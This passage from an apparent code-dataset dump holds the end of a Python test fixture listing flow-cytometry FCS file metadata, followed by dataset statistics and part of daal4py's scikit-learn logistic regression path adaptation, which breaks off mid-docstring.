{"channel": "SSC-A", "index": 4, "reagent": None},
{"channel": "SSC-H", "index": 5, "reagent": None},
{"channel": "SSC-W", "index": 6, "reagent": None},
{"channel": "Blue530-A", "index": 7, "reagent": None},
{"channel": "Blue695-A", "index": 8, "reagent": None},
{"channel": "Vio450-A", "index": 9, "reagent": None},
{"channel": "Vio525-A", "index": 10, "reagent": None},
{"channel": "Vio585-A", "index": 11, "reagent": None},
{"channel": "Vio605-A", "index": 12, "reagent": None},
{"channel": "Vio655-A", "index": 13, "reagent": None},
{"channel": "Vio710-A", "index": 14, "reagent": None},
{"channel": "UV450-A", "index": 15, "reagent": None},
{"channel": "UV530-A", "index": 16, "reagent": None},
{"channel": "Red670-A", "index": 17, "reagent": None},
{"channel": "Red730-A", "index": 18, "reagent": None},
{"channel": "Red780-A", "index": 19, "reagent": None},
{"channel": "YG582-A", "index": 20, "reagent": None},
{"channel": "YG610-A", "index": 21, "reagent": None},
{"channel": "YG670-A", "index": 22, "reagent": None},
{"channel": "YG710-A", "index": 23, "reagent": None},
{"channel": "YG780-A", "index": 24, "reagent": None},
{"channel": "Time", "index": 25, "reagent": None},
],
"panelName": "Panel 1",
"sampleName": " ",
"size": 22625,
},
{
"_id": "5d64abe2ca9df61349ed8e80",
"annotations": [
{"name": "plate", "value": "96 Well - V bottom"},
{"name": "plate row", "value": "A"},
{"name": "plate column", "value": "07"},
{"name": "plate well", "value": "A07"},
],
"crc32c": "11dc920c",
"deleted": False,
"eventCount": 3027,
"experimentId": "5d38a6f79fae87499999a74b",
"filename": "Specimen_001_A7_A07.fcs",
"hasFileInternalComp": True,
"md5": "b29b4a7ac056899cabf566b203493925",
"isControl": False,
"panel": [
{"channel": "FSC-A", "index": 1, "reagent": None},
{"channel": "FSC-H", "index": 2, "reagent": None},
{"channel": "FSC-W", "index": 3, "reagent": None},
{"channel": "SSC-A", "index": 4, "reagent": None},
{"channel": "SSC-H", "index": 5, "reagent": None},
{"channel": "SSC-W", "index": 6, "reagent": None},
{"channel": "Blue530-A", "index": 7, "reagent": None},
{"channel": "Blue695-A", "index": 8, "reagent": None},
{"channel": "Vio450-A", "index": 9, "reagent": None},
{"channel": "Vio525-A", "index": 10, "reagent": None},
{"channel": "Vio585-A", "index": 11, "reagent": None},
{"channel": "Vio605-A", "index": 12, "reagent": None},
{"channel": "Vio655-A", "index": 13, "reagent": None},
{"channel": "Vio710-A", "index": 14, "reagent": None},
{"channel": "UV450-A", "index": 15, "reagent": None},
{"channel": "UV530-A", "index": 16, "reagent": None},
{"channel": "Red670-A", "index": 17, "reagent": None},
{"channel": "Red730-A", "index": 18, "reagent": None},
{"channel": "Red780-A", "index": 19, "reagent": None},
{"channel": "YG582-A", "index": 20, "reagent": None},
{"channel": "YG610-A", "index": 21, "reagent": None},
{"channel": "YG670-A", "index": 22, "reagent": None},
{"channel": "YG710-A", "index": 23, "reagent": None},
{"channel": "YG780-A", "index": 24, "reagent": None},
{"channel": "Time", "index": 25, "reagent": None},
],
"panelName": "Panel 1",
"sampleName": " ",
"size": 307329,
},
{
"_id": "5d64abe2ca9df61349ed8e81",
"annotations": [
{"name": "plate", "value": "96 Well - V bottom"},
{"name": "plate row", "value": "A"},
{"name": "plate column", "value": "08"},
{"name": "plate well", "value": "A08"},
],
"crc32c": "11dc920c",
"deleted": False,
"eventCount": 3684,
"experimentId": "5d38a6f79fae87499999a74b",
"filename": "Specimen_001_A8_A08.fcs",
"hasFileInternalComp": True,
"md5": "1c5955a05bd3e2b46aa58eec88d494b0",
"isControl": False,
"panel": [
{"channel": "FSC-A", "index": 1, "reagent": None},
{"channel": "FSC-H", "index": 2, "reagent": None},
{"channel": "FSC-W", "index": 3, "reagent": None},
{"channel": "SSC-A", "index": 4, "reagent": None},
{"channel": "SSC-H", "index": 5, "reagent": None},
{"channel": "SSC-W", "index": 6, "reagent": None},
{"channel": "Blue530-A", "index": 7, "reagent": None},
{"channel": "Blue695-A", "index": 8, "reagent": None},
{"channel": "Vio450-A", "index": 9, "reagent": None},
{"channel": "Vio525-A", "index": 10, "reagent": None},
{"channel": "Vio585-A", "index": 11, "reagent": None},
{"channel": "Vio605-A", "index": 12, "reagent": None},
{"channel": "Vio655-A", "index": 13, "reagent": None},
{"channel": "Vio710-A", "index": 14, "reagent": None},
{"channel": "UV450-A", "index": 15, "reagent": None},
{"channel": "UV530-A", "index": 16, "reagent": None},
{"channel": "Red670-A", "index": 17, "reagent": None},
{"channel": "Red730-A", "index": 18, "reagent": None},
{"channel": "Red780-A", "index": 19, "reagent": None},
{"channel": "YG582-A", "index": 20, "reagent": None},
{"channel": "YG610-A", "index": 21, "reagent": None},
{"channel": "YG670-A", "index": 22, "reagent": None},
{"channel": "YG710-A", "index": 23, "reagent": None},
{"channel": "YG780-A", "index": 24, "reagent": None},
{"channel": "Time", "index": 25, "reagent": None},
],
"panelName": "Panel 1",
"sampleName": " ",
"size": 373037,
},
{
"_id": "5d64abe2ca9df61349ed8e82",
"annotations": [
{"name": "plate", "value": "96 Well - V bottom"},
{"name": "plate row", "value": "A"},
{"name": "plate column", "value": "09"},
{"name": "plate well", "value": "A09"},
],
"crc32c": "11dc920c",
"deleted": False,
"eventCount": 2196,
"experimentId": "5d38a6f79fae87499999a74b",
"filename": "Specimen_001_A9_A09.fcs",
"hasFileInternalComp": True,
"md5": "9156a780c62bd9bc8d4601d6dae03893",
"isControl": False,
"panel": [
{"channel": "FSC-A", "index": 1, "reagent": None},
{"channel": "FSC-H", "index": 2, "reagent": None},
{"channel": "FSC-W", "index": 3, "reagent": None},
{"channel": "SSC-A", "index": 4, "reagent": None},
{"channel": "SSC-H", "index": 5, "reagent": None},
{"channel": "SSC-W", "index": 6, "reagent": None},
{"channel": "Blue530-A", "index": 7, "reagent": None},
{"channel": "Blue695-A", "index": 8, "reagent": None},
{"channel": "Vio450-A", "index": 9, "reagent": None},
{"channel": "Vio525-A", "index": 10, "reagent": None},
{"channel": "Vio585-A", "index": 11, "reagent": None},
{"channel": "Vio605-A", "index": 12, "reagent": None},
{"channel": "Vio655-A", "index": 13, "reagent": None},
{"channel": "Vio710-A", "index": 14, "reagent": None},
{"channel": "UV450-A", "index": 15, "reagent": None},
{"channel": "UV530-A", "index": 16, "reagent": None},
{"channel": "Red670-A", "index": 17, "reagent": None},
{"channel": "Red730-A", "index": 18, "reagent": None},
{"channel": "Red780-A", "index": 19, "reagent": None},
{"channel": "YG582-A", "index": 20, "reagent": None},
{"channel": "YG610-A", "index": 21, "reagent": None},
{"channel": "YG670-A", "index": 22, "reagent": None},
{"channel": "YG710-A", "index": 23, "reagent": None},
{"channel": "YG780-A", "index": 24, "reagent": None},
{"channel": "Time", "index": 25, "reagent": None},
],
"panelName": "Panel 1",
"sampleName": " ",
"size": 224229,
},
{
"_id": "5d64abe2ca9df61349ed8e83",
"annotations": [
{"name": "plate", "value": "96 Well - V bottom"},
{"name": "plate row", "value": "A"},
{"name": "plate column", "value": "10"},
{"name": "plate well", "value": "A10"},
],
"crc32c": "11dc920c",
"deleted": False,
"eventCount": 1120,
"experimentId": "5d38a6f79fae87499999a74b",
"filename": "Specimen_001_A10_A10.fcs",
"hasFileInternalComp": True,
"md5": "3613a1e91e28bb78da20105654dd779c",
"isControl": False,
"panel": [
{"channel": "FSC-A", "index": 1, "reagent": None},
{"channel": "FSC-H", "index": 2, "reagent": None},
{"channel": "FSC-W", "index": 3, "reagent": None},
{"channel": "SSC-A", "index": 4, "reagent": None},
{"channel": "SSC-H", "index": 5, "reagent": None},
{"channel": "SSC-W", "index": 6, "reagent": None},
{"channel": "Blue530-A", "index": 7, "reagent": None},
{"channel": "Blue695-A", "index": 8, "reagent": None},
{"channel": "Vio450-A", "index": 9, "reagent": None},
{"channel": "Vio525-A", "index": 10, "reagent": None},
{"channel": "Vio585-A", "index": 11, "reagent": None},
{"channel": "Vio605-A", "index": 12, "reagent": None},
{"channel": "Vio655-A", "index": 13, "reagent": None},
{"channel": "Vio710-A", "index": 14, "reagent": None},
{"channel": "UV450-A", "index": 15, "reagent": None},
{"channel": "UV530-A", "index": 16, "reagent": None},
{"channel": "Red670-A", "index": 17, "reagent": None},
{"channel": "Red730-A", "index": 18, "reagent": None},
{"channel": "Red780-A", "index": 19, "reagent": None},
{"channel": "YG582-A", "index": 20, "reagent": None},
{"channel": "YG610-A", "index": 21, "reagent": None},
{"channel": "YG670-A", "index": 22, "reagent": None},
{"channel": "YG710-A", "index": 23, "reagent": None},
{"channel": "YG780-A", "index": 24, "reagent": None},
{"channel": "Time", "index": 25, "reagent": None},
],
"panelName": "Panel 1",
"sampleName": " ",
"size": 116631,
},
{
"_id": "5d64abe2ca9df61349ed8e84",
"annotations": [
{"name": "plate", "value": "96 Well - V bottom"},
{"name": "plate row", "value": "A"},
{"name": "plate column", "value": "11"},
{"name": "plate well", "value": "A11"},
],
"crc32c": "11dc920c",
"deleted": False,
"eventCount": 1135,
"experimentId": "5d38a6f79fae87499999a74b",
"filename": "Specimen_001_A11_A11.fcs",
"hasFileInternalComp": True,
"md5": "34283e8069da17a7315d4c456d3532c6",
"isControl": False,
"panel": [
{"channel": "FSC-A", "index": 1, "reagent": None},
{"channel": "FSC-H", "index": 2, "reagent": None},
{"channel": "FSC-W", "index": 3, "reagent": None},
{"channel": "SSC-A", "index": 4, "reagent": None},
{"channel": "SSC-H", "index": 5, "reagent": None},
{"channel": "SSC-W", "index": 6, "reagent": None},
{"channel": "Blue530-A", "index": 7, "reagent": None},
{"channel": "Blue695-A", "index": 8, "reagent": None},
{"channel": "Vio450-A", "index": 9, "reagent": None},
{"channel": "Vio525-A", "index": 10, "reagent": None},
{"channel": "Vio585-A", "index": 11, "reagent": None},
{"channel": "Vio605-A", "index": 12, "reagent": None},
{"channel": "Vio655-A", "index": 13, "reagent": None},
{"channel": "Vio710-A", "index": 14, "reagent": None},
{"channel": "UV450-A", "index": 15, "reagent": None},
{"channel": "UV530-A", "index": 16, "reagent": None},
{"channel": "Red670-A", "index": 17, "reagent": None},
{"channel": "Red730-A", "index": 18, "reagent": None},
{"channel": "Red780-A", "index": 19, "reagent": None},
{"channel": "YG582-A", "index": 20, "reagent": None},
{"channel": "YG610-A", "index": 21, "reagent": None},
{"channel": "YG670-A", "index": 22, "reagent": None},
{"channel": "YG710-A", "index": 23, "reagent": None},
{"channel": "YG780-A", "index": 24, "reagent": None},
{"channel": "Time", "index": 25, "reagent": None},
],
"panelName": "Panel 1",
"sampleName": " ",
"size": 118131,
},
]
return fcs_files
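# Illustrative usage sketch (an assumption, not part of the original fixture
# file): a test consuming the session-scoped fixture above. The test name and
# assertions are hypothetical; the field names come from the fixture entries.
def test_fcs_files_fixture_shape(fcs_files):
    for fcs_file in fcs_files:
        # Every entry describes a 25-channel panel whose last channel is Time.
        assert fcs_file["filename"].endswith(".fcs")
        assert len(fcs_file["panel"]) == 25
        assert fcs_file["panel"][-1]["channel"] == "Time"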
| 53.52356
| 70
| 0.436108
| 2,726
| 30,669
| 4.887748
| 0.061996
| 0.247673
| 0.389072
| 0.05674
| 0.882618
| 0.80066
| 0.80066
| 0.80066
| 0.80066
| 0.80066
| 0
| 0.104051
| 0.344746
| 30,669
| 572
| 71
| 53.617133
| 0.558967
| 0
| 0
| 0.8
| 0
| 0
| 0.383384
| 0.040399
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001754
| false
| 0
| 0.001754
| 0
| 0.005263
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 9
| 0a5666a9bb2d4f804cd762d051afd60c8075c56f
| 46,943
| py
| Python
| daal4py/sklearn/linear_model/_logistic_path_0_22.py
| agorshk/daal4py
| 58a9b2301c47cd2d5144a403a59c210e10b75f8f
| ["Apache-2.0"] | null | null | null
| daal4py/sklearn/linear_model/_logistic_path_0_22.py
| agorshk/daal4py
| 58a9b2301c47cd2d5144a403a59c210e10b75f8f
| ["Apache-2.0"] | null | null | null
| daal4py/sklearn/linear_model/_logistic_path_0_22.py
| agorshk/daal4py
| 58a9b2301c47cd2d5144a403a59c210e10b75f8f
| ["Apache-2.0"] | null | null | null |
#
#*******************************************************************************
# Copyright 2014-2020 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#******************************************************************************/
import numpy as np
import scipy.sparse as sparse
import scipy.optimize as optimize
import numbers
import warnings
from .logistic_loss import (_daal4py_loss_and_grad,
_daal4py_logistic_loss_extra_args,
_daal4py_cross_entropy_loss_extra_args,
_daal4py_loss_, _daal4py_grad_,
_daal4py_grad_hess_)
from sklearn import __version__ as sklearn_version
from distutils.version import LooseVersion
from sklearn.utils import (check_array,
check_consistent_length,
compute_class_weight,
check_random_state)
from sklearn.utils.validation import _check_sample_weight
from sklearn.linear_model._sag import sag_solver
from sklearn.utils.optimize import _newton_cg, _check_optimize_result
from sklearn.exceptions import ConvergenceWarning
from sklearn.linear_model._logistic import (
_check_solver,
_check_multi_class,
_fit_liblinear,
_logistic_loss_and_grad,
_logistic_loss,
_logistic_grad_hess,
_multinomial_loss,
_multinomial_loss_grad,
_multinomial_grad_hess,
_LOGISTIC_SOLVER_CONVERGENCE_MSG,
LogisticRegression as LogisticRegression_original)
from sklearn.preprocessing import (LabelEncoder, LabelBinarizer)
from sklearn.linear_model._base import (LinearClassifierMixin, SparseCoefMixin, BaseEstimator)
use_daal = True
# Code adapted from sklearn.linear_model.logistic prior to 0.21
def logistic_regression_path(X, y, pos_class=None, Cs=10, fit_intercept=True,
max_iter=100, tol=1e-4, verbose=0,
solver='lbfgs', coef=None,
class_weight=None, dual=False, penalty='l2',
intercept_scaling=1., multi_class='warn',
random_state=None, check_input=True,
max_squared_sum=None, sample_weight=None):
"""Compute a Logistic Regression model for a list of regularization
parameters.
This is an implementation that uses the result of the previous model
to speed up computations along the set of solutions, making it faster
than sequentially calling LogisticRegression for the different parameters.
Note that there will be no speedup with liblinear solver, since it does
not handle warm-starting.
Read more in the :ref:`User Guide <logistic_regression>`.
Parameters
----------
X : array-like or sparse matrix, shape (n_samples, n_features)
Input data.
y : array-like, shape (n_samples,) or (n_samples, n_targets)
Input data, target values.
pos_class : int, None
The class with respect to which we perform a one-vs-all fit.
If None, then it is assumed that the given problem is binary.
Cs : int | array-like, shape (n_cs,)
List of values for the regularization parameter or integer specifying
the number of regularization parameters that should be used. In this
case, the parameters will be chosen in a logarithmic scale between
1e-4 and 1e4.
fit_intercept : bool
Whether to fit an intercept for the model. In this case the shape of
the returned array is (n_cs, n_features + 1).
max_iter : int
Maximum number of iterations for the solver.
tol : float
Stopping criterion. For the newton-cg and lbfgs solvers, the iteration
will stop when ``max{|g_i | i = 1, ..., n} <= tol``
where ``g_i`` is the i-th component of the gradient.
verbose : int
For the liblinear and lbfgs solvers set verbose to any positive
number for verbosity.
solver : {'lbfgs', 'newton-cg', 'liblinear', 'sag', 'saga'}
Numerical solver to use.
coef : array-like, shape (n_features,), default None
Initialization value for coefficients of logistic regression.
Useless for liblinear solver.
class_weight : dict or 'balanced', optional
Weights associated with classes in the form ``{class_label: weight}``.
If not given, all classes are supposed to have weight one.
The "balanced" mode uses the values of y to automatically adjust
weights inversely proportional to class frequencies in the input data
as ``n_samples / (n_classes * np.bincount(y))``.
Note that these weights will be multiplied with sample_weight (passed
through the fit method) if sample_weight is specified.
dual : bool
Dual or primal formulation. Dual formulation is only implemented for
l2 penalty with liblinear solver. Prefer dual=False when
n_samples > n_features.
penalty : str, 'l1' or 'l2'
Used to specify the norm used in the penalization. The 'newton-cg',
'sag' and 'lbfgs' solvers support only l2 penalties.
intercept_scaling : float, default 1.
Useful only when the solver 'liblinear' is used
and self.fit_intercept is set to True. In this case, x becomes
[x, self.intercept_scaling],
i.e. a "synthetic" feature with constant value equal to
intercept_scaling is appended to the instance vector.
The intercept becomes ``intercept_scaling * synthetic_feature_weight``.
        Note! The synthetic feature weight is subject to l1/l2 regularization,
        as are all other features.
To lessen the effect of regularization on synthetic feature weight
(and therefore on the intercept) intercept_scaling has to be increased.
multi_class : str, {'ovr', 'multinomial', 'auto'}, default: 'ovr'
If the option chosen is 'ovr', then a binary problem is fit for each
label. For 'multinomial' the loss minimised is the multinomial loss fit
across the entire probability distribution, *even when the data is
binary*. 'multinomial' is unavailable when solver='liblinear'.
'auto' selects 'ovr' if the data is binary, or if solver='liblinear',
and otherwise selects 'multinomial'.
.. versionadded:: 0.18
Stochastic Average Gradient descent solver for 'multinomial' case.
.. versionchanged:: 0.20
Default will change from 'ovr' to 'auto' in 0.22.
random_state : int, RandomState instance or None, optional, default None
The seed of the pseudo random number generator to use when shuffling
the data. If int, random_state is the seed used by the random number
generator; If RandomState instance, random_state is the random number
generator; If None, the random number generator is the RandomState
instance used by `np.random`. Used when ``solver`` == 'sag' or
'liblinear'.
check_input : bool, default True
If False, the input arrays X and y will not be checked.
max_squared_sum : float, default None
Maximum squared sum of X over samples. Used only in SAG solver.
If None, it will be computed, going through all the samples.
The value should be precomputed to speed up cross validation.
sample_weight : array-like, shape(n_samples,) optional
Array of weights that are assigned to individual samples.
If not provided, then each sample is given unit weight.
Returns
-------
coefs : ndarray, shape (n_cs, n_features) or (n_cs, n_features + 1)
List of coefficients for the Logistic Regression model. If
fit_intercept is set to True then the second dimension will be
n_features + 1, where the last item represents the intercept. For
``multiclass='multinomial'``, the shape is (n_classes, n_cs,
n_features) or (n_classes, n_cs, n_features + 1).
Cs : ndarray
Grid of Cs used for cross-validation.
n_iter : array, shape (n_cs,)
        Actual number of iterations for each Cs.
Notes
-----
You might get slightly different results with the solver liblinear than
with the others since this uses LIBLINEAR which penalizes the intercept.
.. versionchanged:: 0.19
The "copy" parameter was removed.
"""
if isinstance(Cs, numbers.Integral):
Cs = np.logspace(-4, 4, Cs)
solver = _check_solver(solver, penalty, dual)
# Preprocessing.
if check_input:
X = check_array(X, accept_sparse='csr', dtype=np.float64,
accept_large_sparse=solver != 'liblinear')
y = check_array(y, ensure_2d=False, dtype=None)
check_consistent_length(X, y)
_, n_features = X.shape
classes = np.unique(y)
random_state = check_random_state(random_state)
multi_class = _check_multi_class(multi_class, solver, len(classes))
if pos_class is None and multi_class != 'multinomial':
if (classes.size > 2):
raise ValueError('To fit OvR, use the pos_class argument')
# np.unique(y) gives labels in sorted order.
pos_class = classes[1]
# If sample weights exist, convert them to array (support for lists)
# and check length
# Otherwise set them to 1 for all examples
if sample_weight is not None:
sample_weight = np.array(sample_weight, dtype=X.dtype, order='C')
check_consistent_length(y, sample_weight)
default_weights = False
else:
default_weights = (class_weight is None)
sample_weight = np.ones(X.shape[0], dtype=X.dtype)
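    # The daal4py fast path is only attempted when use_daal is set, for the
    # lbfgs/newton-cg solvers on dense (non-sparse) input; everything else
    # falls through to the stock sklearn code paths below.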
daal_ready = use_daal and solver in ['lbfgs', 'newton-cg'] and not sparse.issparse(X)
# If class_weights is a dict (provided by the user), the weights
# are assigned to the original labels. If it is "balanced", then
    # the class_weights are assigned after masking the labels with an OvR.
le = LabelEncoder()
if isinstance(class_weight, dict) or multi_class == 'multinomial':
class_weight_ = compute_class_weight(class_weight, classes, y)
sample_weight *= class_weight_[le.fit_transform(y)]
    # For doing an OvR, we need to mask the labels first; for the
    # multinomial case this is not necessary.
if multi_class == 'ovr':
mask_classes = np.array([-1, 1])
mask = (y == pos_class)
y_bin = np.ones(y.shape, dtype=X.dtype)
y_bin[~mask] = -1.
# for compute_class_weight
if class_weight == "balanced":
class_weight_ = compute_class_weight(class_weight, mask_classes,
y_bin)
sample_weight *= class_weight_[le.fit_transform(y_bin)]
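        # The daal path additionally requires effectively uniform sample
        # weights: either none were supplied, or they are all (close to) one.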
daal_ready = daal_ready and (default_weights or np.allclose(sample_weight, np.ones_like(sample_weight)))
if daal_ready:
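            # The daal backend reserves the intercept slot unconditionally and
            # uses {0, 1} class labels instead of sklearn's {-1, 1} encoding.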
w0 = np.zeros(n_features + 1, dtype=X.dtype)
y_bin[~mask] = 0.
else:
w0 = np.zeros(n_features + int(fit_intercept), dtype=X.dtype)
else:
daal_ready = daal_ready and (default_weights or np.allclose(sample_weight, np.ones_like(sample_weight)))
if solver not in ['sag', 'saga']:
if daal_ready:
Y_multi = le.fit_transform(y).astype(X.dtype, copy=False)
else:
lbin = LabelBinarizer()
Y_multi = lbin.fit_transform(y)
if Y_multi.shape[1] == 1:
Y_multi = np.hstack([1 - Y_multi, Y_multi])
else:
# SAG multinomial solver needs LabelEncoder, not LabelBinarizer
Y_multi = le.fit_transform(y).astype(X.dtype, copy=False)
if daal_ready:
w0 = np.zeros((classes.size, n_features + 1),
order='C', dtype=X.dtype)
else:
w0 = np.zeros((classes.size, n_features + int(fit_intercept)),
order='F', dtype=X.dtype)
if coef is not None:
# it must work both giving the bias term and not
if multi_class == 'ovr':
if coef.size not in (n_features, w0.size):
raise ValueError(
'Initialization coef is of shape %d, expected shape '
'%d or %d' % (coef.size, n_features, w0.size))
if daal_ready:
w0[-coef.size:] = np.roll(coef, 1, -1) if coef.size != n_features else coef
else:
w0[:coef.size] = coef
else:
# For binary problems coef.shape[0] should be 1, otherwise it
# should be classes.size.
n_classes = classes.size
if n_classes == 2:
n_classes = 1
if (coef.shape[0] != n_classes or
coef.shape[1] not in (n_features, n_features + 1)):
raise ValueError(
'Initialization coef is of shape (%d, %d), expected '
'shape (%d, %d) or (%d, %d)' % (
coef.shape[0], coef.shape[1], classes.size,
n_features, classes.size, n_features + 1))
if daal_ready:
w0[:, -coef.shape[1]:] = np.roll(coef, 1, -1) if coef.shape[1] != n_features else coef
else:
if n_classes == 1:
w0[0, :coef.shape[1]] = -coef
w0[1, :coef.shape[1]] = coef
else:
w0[:, :coef.shape[1]] = coef
C_daal_multiplier = 1
# commented out because this is Py3 feature
#def _map_to_binary_logistic_regression():
# nonlocal C_daal_multiplier
# nonlocal w0
# C_daal_multiplier = 2
# w0 *= 2
if multi_class == 'multinomial':
        # fmin_l_bfgs_b and newton-cg accept only ravelled parameters.
if solver in ['lbfgs', 'newton-cg']:
if daal_ready and classes.size == 2:
w0_saved = w0
w0 = w0[-1:, :]
w0 = w0.ravel()
target = Y_multi
if solver == 'lbfgs':
if daal_ready:
if classes.size == 2:
# _map_to_binary_logistic_regression()
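                    # Inlined from the commented-out Py3-only helper above:
                    # the two-class multinomial problem is remapped onto the
                    # binary logistic loss by doubling w0 and the C multiplier.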
C_daal_multiplier = 2
w0 *= 2
daal_extra_args_func = _daal4py_logistic_loss_extra_args
else:
daal_extra_args_func = _daal4py_cross_entropy_loss_extra_args
func = _daal4py_loss_and_grad
else:
func = lambda x, *args: _multinomial_loss_grad(x, *args)[0:2]
elif solver == 'newton-cg':
if daal_ready:
if classes.size == 2:
# _map_to_binary_logistic_regression()
C_daal_multiplier = 2
w0 *= 2
daal_extra_args_func = _daal4py_logistic_loss_extra_args
else:
daal_extra_args_func = _daal4py_cross_entropy_loss_extra_args
func = _daal4py_loss_
grad = _daal4py_grad_
hess = _daal4py_grad_hess_
else:
func = lambda x, *args: _multinomial_loss(x, *args)[0]
grad = lambda x, *args: _multinomial_loss_grad(x, *args)[1]
hess = _multinomial_grad_hess
warm_start_sag = {'coef': w0.T}
else:
target = y_bin
if solver == 'lbfgs':
if daal_ready:
func = _daal4py_loss_and_grad
daal_extra_args_func = _daal4py_logistic_loss_extra_args
else:
func = _logistic_loss_and_grad
elif solver == 'newton-cg':
if daal_ready:
daal_extra_args_func = _daal4py_logistic_loss_extra_args
func = _daal4py_loss_
grad = _daal4py_grad_
hess = _daal4py_grad_hess_
else:
func = _logistic_loss
grad = lambda x, *args: _logistic_loss_and_grad(x, *args)[1]
hess = _logistic_grad_hess
warm_start_sag = {'coef': np.expand_dims(w0, axis=1)}
coefs = list()
n_iter = np.zeros(len(Cs), dtype=np.int32)
for i, C in enumerate(Cs):
if solver == 'lbfgs':
if daal_ready:
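                # The L2 penalty handed to daal is 0.5 / C (cf. daal_penaltyL2
                # in the newton-cg branch below), further divided by
                # C_daal_multiplier to account for the binary-multinomial
                # rescaling above.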
extra_args = daal_extra_args_func(classes.size, w0, X, target, 0., 0.5 / C / C_daal_multiplier,
fit_intercept, value=True, gradient=True, hessian=False)
else:
extra_args = (X, target, 1. / C, sample_weight)
iprint = [-1, 50, 1, 100, 101][
np.searchsorted(np.array([0, 1, 2, 3]), verbose)]
w0, loss, info = optimize.fmin_l_bfgs_b(
func, w0, fprime=None,
args=extra_args,
iprint=iprint, pgtol=tol, maxiter=max_iter)
if daal_ready and C_daal_multiplier == 2:
w0 *= 0.5
if info["warnflag"] == 1:
warnings.warn("lbfgs failed to converge. Increase the number "
"of iterations.", ConvergenceWarning)
# In scipy <= 1.0.0, nit may exceed maxiter.
# See https://github.com/scipy/scipy/issues/7854.
n_iter_i = min(info['nit'], max_iter)
elif solver == 'newton-cg':
if daal_ready:
def make_ncg_funcs(f, value=False, gradient=False, hessian=False):
daal_penaltyL2 = 0.5 / C / C_daal_multiplier
_obj_, X_, y_, n_samples = daal_extra_args_func(
classes.size, w0, X, target, 0., daal_penaltyL2, fit_intercept,
value=value, gradient=gradient, hessian=hessian)
_func_ = lambda x, *args: f(x, _obj_, *args)
return _func_, (X_, y_, n_samples, daal_penaltyL2)
loss_func, extra_args = make_ncg_funcs(func, value=True)
grad_func, _ = make_ncg_funcs(grad, gradient=True)
grad_hess_func, _ = make_ncg_funcs(hess, gradient=True)
w0, n_iter_i = _newton_cg(grad_hess_func, loss_func, grad_func, w0, args=extra_args,
maxiter=max_iter, tol=tol)
else:
args = (X, target, 1. / C, sample_weight)
w0, n_iter_i = _newton_cg(hess, func, grad, w0, args=args,
maxiter=max_iter, tol=tol)
elif solver == 'liblinear':
coef_, intercept_, n_iter_i, = _fit_liblinear(
X, target, C, fit_intercept, intercept_scaling, None,
penalty, dual, verbose, max_iter, tol, random_state,
sample_weight=sample_weight)
if fit_intercept:
w0 = np.concatenate([coef_.ravel(), intercept_])
else:
w0 = coef_.ravel()
elif solver in ['sag', 'saga']:
if multi_class == 'multinomial':
target = target.astype(np.float64)
loss = 'multinomial'
else:
loss = 'log'
if penalty == 'l1':
alpha = 0.
beta = 1. / C
else:
alpha = 1. / C
beta = 0.
w0, n_iter_i, warm_start_sag = sag_solver(
X, target, sample_weight, loss, alpha,
beta, max_iter, tol,
verbose, random_state, False, max_squared_sum, warm_start_sag,
is_saga=(solver == 'saga'))
else:
raise ValueError("solver must be one of {'liblinear', 'lbfgs', "
"'newton-cg', 'sag'}, got '%s' instead" % solver)
if multi_class == 'multinomial':
if daal_ready:
if classes.size == 2:
multi_w0 = w0[np.newaxis, :]
else:
multi_w0 = np.reshape(w0, (classes.size, -1))
else:
n_classes = max(2, classes.size)
multi_w0 = np.reshape(w0, (n_classes, -1))
if n_classes == 2:
multi_w0 = multi_w0[1][np.newaxis, :]
coefs.append(np.require(multi_w0, requirements='O'))
else:
coefs.append(np.require(w0, requirements='O'))
n_iter[i] = n_iter_i
if daal_ready:
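        # Convert daal's intercept-first coefficient layout back to sklearn's
        # intercept-last convention, or drop the unused intercept column when
        # no intercept was fit.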
if fit_intercept:
for i, ci in enumerate(coefs):
coefs[i] = np.roll(ci, -1, -1)
else:
for i, ci in enumerate(coefs):
coefs[i] = np.delete(ci, 0, axis=-1)
return coefs, np.array(Cs), n_iter
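# Minimal usage sketch (illustrative assumption; kept commented so importing
# this module stays side-effect free):
#
#     rng = np.random.RandomState(0)
#     X_demo = rng.randn(40, 3)
#     y_demo = (X_demo[:, 0] > 0).astype(int)
#     coefs, Cs, n_iter = logistic_regression_path(
#         X_demo, y_demo, Cs=3, multi_class='ovr')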
# Code adapted from sklearn.linear_model.logistic version 0.21
def __logistic_regression_path(X, y, pos_class=None, Cs=10, fit_intercept=True,
max_iter=100, tol=1e-4, verbose=0,
solver='lbfgs', coef=None,
class_weight=None, dual=False, penalty='l2',
intercept_scaling=1., multi_class='warn',
random_state=None, check_input=True,
max_squared_sum=None, sample_weight=None,
l1_ratio=None):
"""Compute a Logistic Regression model for a list of regularization
parameters.
This is an implementation that uses the result of the previous model
to speed up computations along the set of solutions, making it faster
than sequentially calling LogisticRegression for the different parameters.
Note that there will be no speedup with liblinear solver, since it does
not handle warm-starting.
Read more in the :ref:`User Guide <logistic_regression>`.
Parameters
----------
X : array-like or sparse matrix, shape (n_samples, n_features)
Input data.
y : array-like, shape (n_samples,) or (n_samples, n_targets)
Input data, target values.
pos_class : int, None
The class with respect to which we perform a one-vs-all fit.
If None, then it is assumed that the given problem is binary.
Cs : int | array-like, shape (n_cs,)
List of values for the regularization parameter or integer specifying
the number of regularization parameters that should be used. In this
case, the parameters will be chosen in a logarithmic scale between
1e-4 and 1e4.
fit_intercept : bool
Whether to fit an intercept for the model. In this case the shape of
the returned array is (n_cs, n_features + 1).
max_iter : int
Maximum number of iterations for the solver.
tol : float
Stopping criterion. For the newton-cg and lbfgs solvers, the iteration
will stop when ``max{|g_i | i = 1, ..., n} <= tol``
where ``g_i`` is the i-th component of the gradient.
verbose : int
For the liblinear and lbfgs solvers set verbose to any positive
number for verbosity.
solver : {'lbfgs', 'newton-cg', 'liblinear', 'sag', 'saga'}
Numerical solver to use.
coef : array-like, shape (n_features,), default None
